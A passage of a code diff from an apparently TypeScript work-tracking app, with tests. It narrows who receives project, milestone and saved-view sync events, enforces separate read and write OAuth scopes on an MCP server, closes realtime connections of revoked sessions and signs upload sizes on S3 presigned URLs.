@@ -75,7 +78,7 @@ export async function createMilestone(
         buildSyncAction({
           syncId,
           organizationId: principal.organizationId,
-          scopes: milestoneScopes(milestone),
+          scopes: await milestoneScopes(tx, milestone),
           action: 'insert',
           model: 'milestone',
           modelId: milestone.id,
@@ -122,7 +125,7 @@ export async function updateMilestone(
         buildSyncAction({
           syncId,
           organizationId: principal.organizationId,
-          scopes: milestoneScopes(milestone),
+          scopes: await milestoneScopes(tx, milestone),
           action: 'update',
           model: 'milestone',
           modelId: milestone.id,
@@ -145,12 +148,13 @@ export async function deleteMilestone(
 
     const syncId = await nextSyncId(tx);
     const actor = await principalActor(tx, principal);
+    const reach = await milestoneScopes(tx, milestone);
     await tx.delete(schema.milestone).where(eq(schema.milestone.id, milestoneId));
     return [
       buildSyncAction({
         syncId,
         organizationId: principal.organizationId,
-        scopes: milestoneScopes(milestone),
+        scopes: reach,
         action: 'delete',
         model: 'milestone',
         modelId: milestoneId,
@@ -218,13 +222,18 @@ export async function reorderMilestones(
       if (updated !== undefined) milestones.push(updated);
     }
 
+    const reach = projectReachScopes(
+      principal.organizationId,
+      projectId,
+      await projectTeamIds(tx, projectId),
+    );
     return {
       milestones,
       actions: milestones.map((row) =>
         buildSyncAction({
           syncId,
           organizationId: principal.organizationId,
-          scopes: milestoneScopes(row),
+          scopes: reach,
           action: 'update',
           model: 'milestone',
           modelId: row.id,

--- a/packages/core/src/work/project-service.ts
+++ b/packages/core/src/work/project-service.ts
@@ -32,8 +32,30 @@ import { nextSyncId } from '../sync/sync-id.ts';
 export type ProjectRow = typeof schema.project.$inferSelect;
 export type ProjectUpdateRow = typeof schema.projectUpdate.$inferSelect;
 
-function projectScopes(row: ProjectRow): string[] {
-  return [scopes.organization(row.organizationId), scopes.project(row.id)];
+export async function projectTeamIds(executor: Executor, projectId: string): Promise<string[]> {
+  const rows = await executor
+    .select({ teamId: schema.projectTeam.teamId })
+    .from(schema.projectTeam)
+    .where(eq(schema.projectTeam.projectId, projectId));
+  return rows.map((row) => row.teamId);
+}
+
+export function projectReachScopes(
+  organizationId: string,
+  projectId: string,
+  teamIds: readonly string[],
+): string[] {
+  if (teamIds.length === 0) {
+    return [scopes.organization(organizationId), scopes.project(projectId)];
+  }
+  return [scopes.project(projectId), ...teamIds.map((teamId) => scopes.team(teamId))];
+}
+
+async function projectScopes(
+  executor: Executor,
+  row: Pick<ProjectRow, 'id' | 'organizationId'>,
+): Promise<string[]> {
+  return projectReachScopes(row.organizationId, row.id, await projectTeamIds(executor, row.id));
 }
 
 async function allocateProjectSlug(
@@ -178,7 +200,7 @@ export async function createProject(
         buildSyncAction({
           syncId,
           organizationId: principal.organizationId,
-          scopes: [...projectScopes(project), ...parsed.teamIds.map((id) => scopes.team(id))],
+          scopes: await projectScopes(tx, project),
           action: 'insert',
           model: 'project',
           modelId: project.id,
@@ -242,7 +264,7 @@ export async function updateProject(
         buildSyncAction({
           syncId,
           organizationId: principal.organizationId,
-          scopes: projectScopes(project),
+          scopes: await projectScopes(tx, project),
           action: 'update',
           model: 'project',
           modelId: project.id,
@@ -281,7 +303,7 @@ export async function archiveProject(
         buildSyncAction({
           syncId,
           organizationId: principal.organizationId,
-          scopes: projectScopes(project),
+          scopes: await projectScopes(tx, project),
           action: 'archive',
           model: 'project',
           modelId: project.id,
@@ -315,12 +337,13 @@ export async function deleteProject(
 
     const syncId = await nextSyncId(tx);
     const actor = await principalActor(tx, principal);
+    const reach = await projectScopes(tx, project);
     await tx.delete(schema.project).where(eq(schema.project.id, projectId));
     return [
       buildSyncAction({
         syncId,
         organizationId: principal.organizationId,
-        scopes: projectScopes(project),
+        scopes: reach,
         action: 'delete',
         model: 'project',
         modelId: projectId,
@@ -483,7 +506,7 @@ export async function postProjectUpdate(
         buildSyncAction({
           syncId,
           organizationId: principal.organizationId,
-          scopes: projectScopes(project),
+          scopes: await projectScopes(tx, project),
           action: 'update',
           model: 'project',
           modelId: project.id,

--- a/packages/core/src/work/view-service.ts
+++ b/packages/core/src/work/view-service.ts
@@ -36,7 +36,12 @@ export interface ViewRecord {
 
 const VIEW_FAVORITE_ENTITY = 'view';
 
+function isShared(row: ViewRow): boolean {
+  return row.shared === 'true';
+}
+
 function viewScopes(row: ViewRow): string[] {
+  if (!isShared(row)) return [scopes.user(row.ownerId)];
   return [scopes.organization(row.organizationId), scopes.user(row.ownerId)];
 }
 
@@ -202,9 +207,33 @@ export async function updateView(
           data: view,
           actor,
         }),
+        ...unshareActions({ syncId, actor, before: current, after: view }),
       ],
     };
   });
+}
+
+interface UnshareInput {
+  readonly syncId: number;
+  readonly actor: Awaited<ReturnType<typeof principalActor>>;
+  readonly before: ViewRow;
+  readonly after: ViewRow;
+}
+
+function unshareActions(input: UnshareInput): SyncAction[] {
+  if (!isShared(input.before) || isShared(input.after)) return [];
+  return [
+    buildSyncAction({
+      syncId: input.syncId,
+      organizationId: input.after.organizationId,
+      scopes: [scopes.organization(input.after.organizationId)],
+      action: 'delete',
+      model: 'view',
+      modelId: input.after.id,
+      data: { id: input.after.id },
+      actor: input.actor,
+    }),
+  ];
 }
 
 export async function deleteView(principal: Principal, viewId: string): Promise<SyncAction[]> {

--- a/packages/core/tests/analytics/saved-view-scopes.test.ts
+++ b/packages/core/tests/analytics/saved-view-scopes.test.ts
@@ -1,0 +1,93 @@
+import { beforeEach, describe, expect, it } from 'bun:test';
+import { scopes } from '@orbit/shared/events';
+import {
+  createSavedAnalyticsView,
+  deleteSavedAnalyticsView,
+  updateSavedAnalyticsView,
+} from '../../src/analytics/saved-view.ts';
+import { createWorkspace, resetDatabase, type Workspace } from '../../src/test-support.ts';
+
+let workspace: Workspace;
+
+beforeEach(async () => {
+  await resetDatabase();
+  workspace = await createWorkspace('Nova');
+});
+
+const CONFIG = { kind: 'velocity' as const };
+
+async function newView(shared: boolean) {
+  return await createSavedAnalyticsView(workspace.admin, {
+    name: 'Layoff modelling',
+    config: CONFIG,
+    shared,
+  });
+}
+
+describe('a private analytics view', () => {
+  it('is announced to its owner alone, not the whole workspace', async () => {
+    const created = await newView(false);
+
+    expect(created.actions[0]?.scopes).toEqual([scopes.user(workspace.admin.userId)]);
+  });
+
+  it('keeps its name and config off the organization channel', async () => {
+    const created = await newView(false);
+
+    const orgScope = scopes.organization(workspace.organizationId);
+    for (const action of created.actions) {
+      expect(action.scopes).not.toContain(orgScope);
+    }
+    expect(JSON.stringify(created.actions)).toContain('Layoff modelling');
+  });
+
+  it('stays private through an update', async () => {
+    const created = await newView(false);
+
+    const updated = await updateSavedAnalyticsView(workspace.admin, created.view.id, {
+      name: 'Layoff modelling v2',
+    });
+
+    expect(updated.actions[0]?.scopes).toEqual([scopes.user(workspace.admin.userId)]);
+  });
+
+  it('stays private when it is deleted', async () => {
+    const created = await newView(false);
+
+    const actions = await deleteSavedAnalyticsView(workspace.admin, created.view.id);
+
+    expect(actions[0]?.scopes).toEqual([scopes.user(workspace.admin.userId)]);
+  });
+});
+
+describe('a shared analytics view', () => {
+  it('reaches the workspace', async () => {
+    const created = await newView(true);
+
+    expect(created.actions[0]?.scopes).toContain(scopes.organization(workspace.organizationId));
+    expect(created.actions[0]?.scopes).toContain(scopes.user(workspace.admin.userId));
+  });
+
+  it('is withdrawn from the workspace when it is unshared', async () => {
+    const created = await newView(true);
+
+    const updated = await updateSavedAnalyticsView(workspace.admin, created.view.id, {
+      shared: false,
+    });
+
+    expect(updated.actions[0]?.scopes).toEqual([scopes.user(workspace.admin.userId)]);
+    const withdrawal = updated.actions.find((action) => action.action === 'delete');
+    expect(withdrawal?.scopes).toEqual([scopes.organization(workspace.organizationId)]);
+    expect(JSON.stringify(withdrawal?.data)).not.toContain('Layoff modelling');
+  });
+
+  it('does not send a withdrawal when it stays shared', async () => {
+    const created = await newView(true);
+
+    const updated = await updateSavedAnalyticsView(workspace.admin, created.view.id, {
+      name: 'Still shared',
+    });
+
+    expect(updated.actions.filter((action) => action.action === 'delete')).toHaveLength(0);
+  });
+});

--- a/packages/core/tests/work/milestone-service.test.ts
+++ b/packages/core/tests/work/milestone-service.test.ts
@@ -1,9 +1,11 @@
 import { beforeEach, describe, expect, it } from 'bun:test';
 import { db, eq, schema } from '@orbit/db';
+import { scopes } from '@orbit/shared/events';
 import { createTeam } from '../../src/org/team-service.ts';
 import {
   addMember,
   createWorkspace,
+  reaches,
   resetDatabase,
   type Workspace,
 } from '../../src/test-support.ts';
@@ -215,5 +217,59 @@ describe('milestone visibility', () => {
 
     const renamed = await updateMilestone(principal, milestone.id, { name: 'Beta' });
     expect(renamed.milestone.name).toBe('Beta');
+  });
+});
+
+describe('a milestone delta follows the teams of its project', () => {
+  async function outsider() {
+    const { team } = await createTeam(workspace.admin, { name: 'Outside', key: 'OUT' });
+    const { principal } = await addMember(workspace, 'member', {
+      name: 'Outsider',
+      teamIds: [team.id],
+    });
+    return principal;
+  }
+
+  it('keeps every milestone delta of a restricted project off the workspace scope', async () => {
+    const stranger = await outsider();
+    const { principal: insider } = await addMember(workspace, 'member', {
+      name: 'Insider',
+      teamIds: [workspace.teamId],
+    });
+    const projectId = await newProject('Restricted launch');
+
+    const created = await createMilestone(workspace.admin, { projectId, name: 'Alpha' });
+    const renamed = await updateMilestone(workspace.admin, created.milestone.id, { name: 'Beta' });
+    const reordered = await reorderMilestones(workspace.admin, projectId, [created.milestone.id]);
+    const removed = await deleteMilestone(workspace.admin, created.milestone.id);
+
+    const emitted = [...created.actions, ...renamed.actions, ...reordered.actions, ...removed];
+    expect(emitted).toHaveLength(4);
+    for (const action of emitted) {
+      expect(action.scopes).toContain(scopes.team(workspace.teamId));
+      expect(action.scopes).toContain(scopes.project(projectId));
+      expect(action.scopes).not.toContain(scopes.organization(workspace.organizationId));
+      expect(reaches(stranger, action)).toBe(false);
+      expect(reaches(insider, action)).toBe(true);
+    }
+  });
+
+  it('still reaches the whole workspace for a project that belongs to no team', async () => {
+    const stranger = await outsider();
+    const { project } = await createProject(workspace.admin, { name: 'Company wiki' });
+
+    const { actions } = await createMilestone(workspace.admin, {
+      projectId: project.id,
+      name: 'Alpha',
+    });
+
+    const action = actions[0];
+    expect(action?.scopes).toEqual(
+      expect.arrayContaining([
+        scopes.organization(workspace.organizationId),
+        scopes.project(project.id),
+      ]),
+    );
+    expect(action === undefined ? false : reaches(stranger, action)).toBe(true);
   });
 });

--- a/packages/core/tests/work/project-service.test.ts
+++ b/packages/core/tests/work/project-service.test.ts
@@ -4,6 +4,7 @@ import { createTeam } from '../../src/org/team-service.ts';
 import {
   addMember,
   createWorkspace,
+  reaches,
   resetDatabase,
   stateNamed,
   type Workspace,
@@ -18,6 +19,7 @@ import {
   addProjectTeam,
   archiveProject,
   createProject,
+  deleteProject,
   getProject,
   listProjects,
   listProjectsForTeams,
@@ -342,5 +344,96 @@ describe('the payload the client boots from', () => {
     const forTeams = await listProjectsForTeams(workspace.admin, [workspace.teamId]);
 
     expect(forTeams.map((row) => row.id)).toContain(project.id);
+  });
+});
+
+describe('a project delta reaches only the teams that own the project', () => {
+  async function outsider() {
+    const { team } = await createTeam(workspace.admin, { name: 'Design', key: 'DSGN' });
+    const { principal } = await addMember(workspace, 'member', {
+      name: 'Outsider',
+      teamIds: [team.id],
+    });
+    return principal;
+  }
+
+  it('scopes a restricted project to its teams, never to the whole workspace', async () => {
+    const stranger = await outsider();
+    const { project, actions } = await createProject(workspace.admin, {
+      name: 'Restricted',
+      teamIds: [workspace.teamId],
+    });
+
+    const created = actions[0];
+    expect(created?.scopes).toEqual(
+      expect.arrayContaining([scopes.team(workspace.teamId), scopes.project(project.id)]),
+    );
+    expect(created?.scopes).not.toContain(scopes.organization(workspace.organizationId));
+    expect(created === undefined ? true : reaches(stranger, created)).toBe(false);
+  });
+
+  it('keeps every later restricted project delta away from another team', async () => {
+    const stranger = await outsider();
+    const { principal: insider } = await addMember(workspace, 'member', {
+      name: 'Insider',
+      teamIds: [workspace.teamId],
+    });
+    const { project } = await createProject(workspace.admin, {
+      name: 'Restricted',
+      teamIds: [workspace.teamId],
+    });
+
+    const updated = await updateProject(workspace.admin, project.id, { summary: 'Moving' });
+    const posted = await postProjectUpdate(workspace.admin, project.id, {
+      health: 'at_risk',
+      body: 'Slipping.',
+    });
+    const archived = await archiveProject(workspace.admin, project.id);
+    const removed = await deleteProject(workspace.admin, project.id);
+
+    const emitted = [...updated.actions, ...posted.actions, ...archived.actions, ...removed];
+    expect(emitted).toHaveLength(4);
+    for (const action of emitted) {
+      expect(action.scopes).toContain(scopes.team(workspace.teamId));
+      expect(action.scopes).not.toContain(scopes.organization(workspace.organizationId));
+      expect(reaches(stranger, action)).toBe(false);
+      expect(reaches(insider, action)).toBe(true);
+    }
+  });
+
+  it('follows the project when its teams change', async () => {
+    const stranger = await outsider();
+    const { project } = await createProject(workspace.admin, {
+      name: 'Handover',
+      teamIds: [workspace.teamId],
+    });
+
+    const { actions } = await updateProject(workspace.admin, project.id, {
+      teamIds: [...stranger.teamIds],
+    });
+
+    const action = actions[0];
+    expect(action?.scopes).not.toContain(scopes.organization(workspace.organizationId));
+    expect(action === undefined ? false : reaches(stranger, action)).toBe(true);
+  });
+
+  it('still reaches a member of another team when the project has no teams', async () => {
+    const stranger = await outsider();
+    const { project, actions } = await createProject(workspace.admin, { name: 'Company wiki' });
+
+    const created = actions[0];
+    expect(created?.scopes).toEqual(
+      expect.arrayContaining([
+        scopes.organization(workspace.organizationId),
+        scopes.project(project.id),
+      ]),
+    );
+    expect(created === undefined ? false : reaches(stranger, created)).toBe(true);
+
+    const { actions: renamed } = await updateProject(workspace.admin, project.id, {
+      name: 'Company handbook',
+    });
+    const update = renamed[0];
+    expect(update === undefined ? false : reaches(stranger, update)).toBe(true);
   });
 });

--- a/packages/core/tests/work/view-service.test.ts
+++ b/packages/core/tests/work/view-service.test.ts
@@ -1,0 +1,100 @@
+import { beforeEach, describe, expect, it } from 'bun:test';
+import type { SyncAction } from '@orbit/shared/events';
+import { scopes } from '@orbit/shared/events';
+import {
+  addMember,
+  createWorkspace,
+  reaches,
+  resetDatabase,
+  type Workspace,
+} from '../../src/test-support.ts';
+import { createView, deleteView, listViews, updateView } from '../../src/work/view-service.ts';
+
+let workspace: Workspace;
+
+beforeEach(async () => {
+  await resetDatabase();
+  workspace = await createWorkspace('Nova');
+});
+
+function privateInput(name: string) {
+  return { name, filter: { groupBy: 'state', visibility: 'private' } };
+}
+
+function sharedInput(name: string) {
+  return { name, filter: { groupBy: 'state', visibility: 'workspace' } };
+}
+
+function only(actions: readonly SyncAction[]): SyncAction {
+  const [action] = actions;
+  if (action === undefined) throw new Error('no sync action was published');
+  return action;
+}
+
+describe('a saved view only reaches the people who can open it', () => {
+  it('keeps a private view on its owner scope alone', async () => {
+    const { principal: colleague } = await addMember(workspace, 'member', { name: 'Colleague' });
+    const created = await createView(workspace.admin, privateInput('My work'));
+
+    const insert = only(created.actions);
+    expect(insert.scopes).toEqual([scopes.user(workspace.admin.userId)]);
+    expect(insert.scopes).not.toContain(scopes.organization(workspace.organizationId));
+    expect(reaches(colleague, insert)).toBe(false);
+    expect(reaches(workspace.admin, insert)).toBe(true);
+  });
+
+  it('keeps every later delta of a private view off the workspace scope', async () => {
+    const { principal: colleague } = await addMember(workspace, 'member', { name: 'Colleague' });
+    const created = await createView(workspace.admin, privateInput('My work'));
+
+    const renamed = await updateView(workspace.admin, created.view.id, { name: 'Still mine' });
+    const removed = await deleteView(workspace.admin, created.view.id);
+
+    for (const action of [...renamed.actions, ...removed]) {
+      expect(action.scopes).not.toContain(scopes.organization(workspace.organizationId));
+      expect(reaches(colleague, action)).toBe(false);
+      expect(reaches(workspace.admin, action)).toBe(true);
+    }
+  });
+
+  it('never carries the filter of a private view in a delta anyone else receives', async () => {
+    const { principal: colleague } = await addMember(workspace, 'member', { name: 'Colleague' });
+    const created = await createView(workspace.admin, privateInput('Layoff planning'));
+
+    const insert = only(created.actions);
+    expect(JSON.stringify(insert.data)).toContain('Layoff planning');
+    expect(reaches(colleague, insert)).toBe(false);
+  });
+
+  it('still announces a shared view to the whole workspace', async () => {
+    const { principal: colleague } = await addMember(workspace, 'member', { name: 'Colleague' });
+    const created = await createView(workspace.admin, sharedInput('Team triage'));
+
+    const insert = only(created.actions);
+    expect(insert.scopes).toContain(scopes.organization(workspace.organizationId));
+    expect(reaches(colleague, insert)).toBe(true);
+
+    const renamed = await updateView(workspace.admin, created.view.id, { name: 'Triage' });
+    expect(reaches(colleague, only(renamed.actions))).toBe(true);
+    expect((await listViews(colleague)).some((view) => view.id === created.view.id)).toBe(true);
+  });
+
+  it('tells the workspace a view is gone when its owner makes it private', async () => {
+    const { principal: colleague } = await addMember(workspace, 'member', { name: 'Colleague' });
+    const created = await createView(workspace.admin, sharedInput('Team triage'));
+
+    const { actions } = await updateView(workspace.admin, created.view.id, {
+      filter: { ...created.view.state, visibility: 'private' },
+    });
+
+    const forEveryoneElse = actions.filter((action) => reaches(colleague, action));
+    expect(forEveryoneElse).toHaveLength(1);
+    expect(forEveryoneElse[0]?.action).toBe('delete');
+    expect(JSON.stringify(forEveryoneElse[0]?.data)).not.toContain('Team triage');
+    expect((await listViews(colleague)).some((view) => view.id === created.view.id)).toBe(false);
+
+    const forTheOwner = actions.filter((action) => action.action !== 'delete');
+    expect(forTheOwner).toHaveLength(1);
+    expect(forTheOwner[0]?.scopes).toEqual([scopes.user(workspace.admin.userId)]);
+  });
+});

--- a/packages/mcp-server/src/server.ts
+++ b/packages/mcp-server/src/server.ts
@@ -2,11 +2,11 @@ import { McpServer } from '@modelcontextprotocol/sdk/server/mcp.js';
 import { WebStandardStreamableHTTPServerTransport } from '@modelcontextprotocol/sdk/server/webStandardStreamableHttp.js';
 import type { Transport } from '@modelcontextprotocol/sdk/shared/transport.js';
 import { verifyMcpAccessToken } from '@orbit/core';
-import { toDomainError, unauthorized } from '@orbit/shared/errors';
+import { forbidden, toDomainError, unauthorized } from '@orbit/shared/errors';
 import type { Principal } from '@orbit/shared/policy';
 import { errorFields, logger } from './logger.ts';
 import { registerTools } from './tools/index.ts';
-import { allowWrites } from './tools/support.ts';
+import { allowTools } from './tools/support.ts';
 
 export const MCP_PATH = '/mcp';
 
@@ -24,18 +24,28 @@ export function wwwAuthenticate(publicUrl: string): string {
   return `Bearer resource_metadata="${base}/.well-known/oauth-protected-resource/mcp"`;
 }
 
+export const ORBIT_READ_SCOPE = 'orbit.read';
 export const ORBIT_WRITE_SCOPE = 'orbit.write';
+const EVERY_ORBIT_SCOPE = `${ORBIT_READ_SCOPE} ${ORBIT_WRITE_SCOPE}`;
 
-export function grantsWrites(scopes: string): boolean {
-  return scopes.split(/\s+/).filter(Boolean).includes(ORBIT_WRITE_SCOPE);
+function granted(scopes: string): Set<string> {
+  return new Set(scopes.split(/[\s,]+/).filter(Boolean));
 }
 
-export function createOrbitMcpServer(principal: Principal, scopes = ORBIT_WRITE_SCOPE): McpServer {
+export function grantsReads(scopes: string): boolean {
+  return granted(scopes).has(ORBIT_READ_SCOPE);
+}
+
+export function grantsWrites(scopes: string): boolean {
+  return granted(scopes).has(ORBIT_WRITE_SCOPE);
+}
+
+export function createOrbitMcpServer(principal: Principal, scopes = EVERY_ORBIT_SCOPE): McpServer {
   const server = new McpServer(
     { name: 'orbit', version: SERVER_VERSION },
     { capabilities: { tools: {} }, instructions: INSTRUCTIONS },
   );
-  allowWrites(server, grantsWrites(scopes));
+  allowTools(server, { reads: grantsReads(scopes), writes: grantsWrites(scopes) });
   registerTools(server, principal);
   return server;
 }
@@ -61,6 +71,9 @@ export interface McpRequestOptions {
 
 async function dispatch(request: Request): Promise<Response> {
   const identity = await verifyMcpAccessToken(bearerToken(request));
+  if (!(grantsReads(identity.scopes) || grantsWrites(identity.scopes))) {
+    throw forbidden('This client holds neither the orbit.read nor the orbit.write scope.');
+  }
   const server = createOrbitMcpServer(identity.principal, identity.scopes);
   const transport = new WebStandardStreamableHTTPServerTransport({ enableJsonResponse: true });
   await server.connect(transport as unknown as Transport);

--- a/packages/mcp-server/src/tools/support.ts
+++ b/packages/mcp-server/src/tools/support.ts
@@ -51,14 +51,22 @@ export interface ToolConfig<Shape extends z.ZodRawShape> {
   readonly inputSchema: Shape;
 }
 
-const WRITES_ALLOWED = new WeakMap<McpServer, boolean>();
+export interface ToolAccess {
+  readonly reads: boolean;
+  readonly writes: boolean;
+}
 
-export function allowWrites(server: McpServer, allowed: boolean): void {
-  WRITES_ALLOWED.set(server, allowed);
+const DENY_EVERYTHING: ToolAccess = { reads: false, writes: false };
+
+const GRANTED = new WeakMap<McpServer, ToolAccess>();
+
+export function allowTools(server: McpServer, access: ToolAccess): void {
+  GRANTED.set(server, access);
 }
 
 function mayRegister(server: McpServer, readOnly: boolean): boolean {
-  return readOnly || WRITES_ALLOWED.get(server) !== false;
+  const access = GRANTED.get(server) ?? DENY_EVERYTHING;
+  return readOnly ? access.reads : access.writes;
 }
 
 export function defineTool<Shape extends z.ZodRawShape>(

--- a/packages/mcp-server/tests/auth.test.ts
+++ b/packages/mcp-server/tests/auth.test.ts
@@ -5,10 +5,12 @@ import { DomainError } from '@orbit/shared/errors';
 import { MCP_PATH } from '../src/server.ts';
 import {
   callMcp,
+  connect,
   createWorkspace,
   MCP_TEST_ORIGIN,
   mintToken,
   resetDatabase,
+  type TestClient,
   type TestWorkspace,
 } from '../src/test-helpers.ts';
 
@@ -116,5 +118,88 @@ describe('http transport', () => {
     expect(response.status).toBe(405);
     expect(response.headers.get('allow')).toBe('POST');
     await response.body?.cancel();
+  });
+});
+
+describe('the granted oauth scopes decide which tools exist', () => {
+  async function clientWith(scopes: string): Promise<TestClient> {
+    return await connect(
+      await mintToken(
+        workspace.organizationId,
+        workspace.adminUser.id,
+        `Client for ${scopes}`,
+        scopes,
+      ),
+    );
+  }
+
+  async function toolNames(client: TestClient): Promise<string[]> {
+    const { tools } = await client.client.listTools();
+    return tools.map((tool) => tool.name);
+  }
+
+  async function readOnlyNames(client: TestClient): Promise<string[]> {
+    const { tools } = await client.client.listTools();
+    return tools.filter((tool) => tool.annotations?.readOnlyHint === true).map((tool) => tool.name);
+  }
+
+  it('turns an openid only token away instead of letting it read the workspace', async () => {
+    const token = await mintToken(
+      workspace.organizationId,
+      workspace.adminUser.id,
+      'Openid only client',
+      'openid profile email',
+    );
+
+    const response = await post({ authorization: `Bearer ${token}` });
+    expect(response.status).toBe(403);
+    expect(await response.text()).toContain('orbit.read');
+  });
+
+  it('offers a read scoped token exactly the read tools and refuses a write call', async () => {
+    const full = await clientWith('openid orbit.read orbit.write');
+    const reader = await clientWith('openid orbit.read');
+    try {
+      const everything = await toolNames(full);
+      const reads = await readOnlyNames(full);
+      const writes = everything.filter((name) => !reads.includes(name));
+      expect(reads.length).toBeGreaterThan(0);
+      expect(writes.length).toBeGreaterThan(0);
+
+      const offered = await toolNames(reader);
+      expect([...offered].sort()).toEqual([...reads].sort());
+      for (const name of writes) {
+        expect(offered).not.toContain(name);
+      }
+
+      expect((await reader.result('get_me'))['role']).toBe('admin');
+      const denied = await reader.call('create_team', { name: 'Smuggled', key: 'SMUG' });
+      expect(denied.isError).toBe(true);
+      const teams = (await full.result('list_teams'))['teams'] as { name: string }[];
+      expect(teams.map((team) => team.name)).not.toContain('Smuggled');
+    } finally {
+      await full.close();
+      await reader.close();
+    }
+  });
+
+  it('offers a write scoped token no read tool and refuses a read call', async () => {
+    const full = await clientWith('openid orbit.read orbit.write');
+    const writer = await clientWith('openid orbit.write');
+    try {
+      const reads = await readOnlyNames(full);
+      const offered = await toolNames(writer);
+
+      expect(offered.length).toBeGreaterThan(0);
+      expect(reads.length).toBeGreaterThan(0);
+      for (const name of reads) {
+        expect(offered).not.toContain(name);
+      }
+      expect((await writer.call('get_me')).isError).toBe(true);
+      expect((await writer.call('search_issues', { query: 'anything' })).isError).toBe(true);
+    } finally {
+      await full.close();
+      await writer.close();
+    }
   });
 });

--- a/packages/realtime-server/src/auth.ts
+++ b/packages/realtime-server/src/auth.ts
@@ -131,6 +131,16 @@ export async function authenticateTicket(
 
 export const memberDeleteSchema = z.object({ userId: z.string().min(1) });
 
+export async function liveSessionIds(sessionIds: readonly string[]): Promise<Set<string>> {
+  const wanted = [...new Set(sessionIds)];
+  if (wanted.length === 0) return new Set();
+  const rows = await db
+    .select({ id: schema.session.id })
+    .from(schema.session)
+    .where(and(inArray(schema.session.id, wanted), gt(schema.session.expiresAt, new Date())));
+  return new Set(rows.map((row) => row.id));
+}
+
 export async function sessionStillValid(sessionId: string): Promise<boolean> {
   const rows = await db
     .select({ id: schema.session.id })

--- a/packages/realtime-server/src/hub.ts
+++ b/packages/realtime-server/src/hub.ts
@@ -23,6 +23,7 @@ import {
   authenticateTicket,
   authorizeScope,
   type ConnectionRejection,
+  liveSessionIds,
   memberDeleteSchema,
   membershipStillValid,
   readTicketFrame,
@@ -39,6 +40,7 @@ export const MAX_BUFFERED_BYTES = 1_048_576;
 export const MESSAGE_BURST = 60;
 export const MESSAGES_PER_SECOND = 20;
 export const AUTH_TIMEOUT_MS = 10_000;
+export const SESSION_SWEEP_INTERVAL_MS = 60_000;
 
 export interface RealtimeHubOptions {
   redisUrl?: string;
@@ -47,6 +49,7 @@ export interface RealtimeHubOptions {
   batchWindowMs?: number;
   heartbeatIntervalMs?: number;
   heartbeatTimeoutMs?: number;
+  sessionSweepIntervalMs?: number;
   presenceTtlMs?: number;
   maxSubscriptions?: number;
   maxBufferedBytes?: number;
@@ -100,6 +103,7 @@ export async function createRealtimeHub(options: RealtimeHubOptions = {}): Promi
   };
   const heartbeatIntervalMs = options.heartbeatIntervalMs ?? HEARTBEAT_INTERVAL_MS;
   const heartbeatTimeoutMs = options.heartbeatTimeoutMs ?? HEARTBEAT_TIMEOUT_MS;
+  const sessionSweepIntervalMs = options.sessionSweepIntervalMs ?? SESSION_SWEEP_INTERVAL_MS;
   const presenceTtlMs = options.presenceTtlMs ?? PRESENCE_TTL_MS;
   const authTimeoutMs = options.authTimeoutMs ?? AUTH_TIMEOUT_MS;
   const redisUrl = options.redisUrl ?? process.env['REDIS_URL'] ?? 'redis://localhost:6380';
@@ -154,12 +158,26 @@ export async function createRealtimeHub(options: RealtimeHubOptions = {}): Promi
       });
     }
     if (valid) return;
+    closeRevokedSession(connection);
+  }
+
+  function closeRevokedSession(connection: Connection): void {
     logger.info('closing connection for a revoked session', {
       connectionId: connection.id,
       userId: connection.principal.userId,
     });
     connections.delete(connection.id);
     connection.close(SESSION_REVOKED_CLOSE_CODE, 'session_revoked');
+  }
+
+  async function sweepSessions(): Promise<void> {
+    const open = [...connections.values()];
+    if (open.length === 0) return;
+    const live = await liveSessionIds(open.map((connection) => connection.principal.sessionId));
+    for (const connection of open) {
+      if (live.has(connection.principal.sessionId)) continue;
+      closeRevokedSession(connection);
+    }
   }
 
   function revalidateSessionsFor(userId: string): void {
@@ -511,10 +529,18 @@ export async function createRealtimeHub(options: RealtimeHubOptions = {}): Promi
   const sweeper = setInterval(() => presence.sweep(), Math.max(1_000, presenceTtlMs / 3));
   sweeper.unref();
 
+  const sessionSweeper = setInterval(() => {
+    sweepSessions().catch((error: unknown) => {
+      logger.error('session sweep failed', errorFields(error));
+    });
+  }, sessionSweepIntervalMs);
+  sessionSweeper.unref();
+
   async function close(): Promise<void> {
     closing = true;
     clearInterval(heartbeat);
     clearInterval(sweeper);
+    clearInterval(sessionSweeper);
     for (const connection of connections.values()) connection.close(1001, 'server shutting down');
     connections.clear();
     subscriber.disconnect();

--- a/packages/services/src/storage/s3.ts
+++ b/packages/services/src/storage/s3.ts
@@ -6,7 +6,13 @@ import {
   S3Client,
 } from '@aws-sdk/client-s3';
 import { getSignedUrl } from '@aws-sdk/s3-request-presigner';
-import { internal, MAX_UPLOAD_BYTES } from '@orbit/shared';
+import {
+  formatBytes,
+  internal,
+  MAX_UPLOAD_BYTES,
+  payloadTooLarge,
+  validationFailed,
+} from '@orbit/shared';
 import { z } from 'zod';
 import { createCredentialResolver, type ResolvedCredentials } from './credentials.ts';
 import { assertSafeKey } from './key.ts';
@@ -26,6 +32,17 @@ export type S3Config = z.input<typeof s3ConfigSchema>;
 
 const UPLOAD_URL_TTL_SECONDS = 900;
 const DEFAULT_CONTENT_TYPE = 'application/octet-stream';
+
+function assertSignableLength(contentLength: number): void {
+  if (!Number.isSafeInteger(contentLength) || contentLength <= 0) {
+    throw validationFailed('An upload has to declare how many bytes it carries.');
+  }
+  if (contentLength > MAX_UPLOAD_BYTES) {
+    throw payloadTooLarge(`Files must be ${formatBytes(MAX_UPLOAD_BYTES)} or smaller.`, {
+      details: { size: contentLength, maxBytes: MAX_UPLOAD_BYTES },
+    });
+  }
+}
 
 export class S3StorageDriver implements StorageDriver {
   readonly name = 's3' as const;
@@ -80,20 +97,30 @@ export class S3StorageDriver implements StorageDriver {
     return client;
   }
 
-  async createUploadTarget(key: string, contentType: string): Promise<UploadTarget> {
+  async createUploadTarget(
+    key: string,
+    contentType: string,
+    contentLength: number,
+  ): Promise<UploadTarget> {
     assertSafeKey(key);
+    assertSignableLength(contentLength);
     const client = await this.client();
     const url = await getSignedUrl(
       client,
-      new PutObjectCommand({ Bucket: this.bucket, Key: key, ContentType: contentType }),
-      { expiresIn: UPLOAD_URL_TTL_SECONDS },
+      new PutObjectCommand({
+        Bucket: this.bucket,
+        Key: key,
+        ContentType: contentType,
+        ContentLength: contentLength,
+      }),
+      { expiresIn: UPLOAD_URL_TTL_SECONDS, signableHeaders: new Set(['content-length']) },
     );
     return {
       key,
       url,
       method: 'PUT',
       headers: { 'content-type': contentType },
-      maxBytes: MAX_UPLOAD_BYTES,
+      maxBytes: contentLength,
